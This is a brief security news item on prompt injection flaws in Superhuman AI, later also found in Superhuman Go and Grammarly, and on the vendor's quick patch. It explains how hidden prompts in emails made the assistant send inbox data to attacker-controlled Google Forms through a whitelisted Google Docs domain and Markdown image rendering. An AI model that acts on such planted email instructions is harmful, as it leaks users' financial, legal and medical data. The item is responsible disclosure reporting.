Superhuman AI Exfiltrates Emails

Security researchers discovered critical prompt injection vulnerabilities in Superhuman AI that allowed attackers to exfiltrate sensitive emails without user interaction. By embedding malicious prompts in emails, attackers could manipulate the AI to extract financial, legal, and medical data from users' inboxes and submit it to attacker-controlled Google Forms. The attack exploited Superhuman's Content Security Policy whitelist for Google Docs and used Markdown image rendering to trigger automatic data submission. Similar zero-click vulnerabilities were found in Superhuman Go and Grammarly. Superhuman responded quickly, disabling vulnerable features and deploying remediation patches within days of disclosure.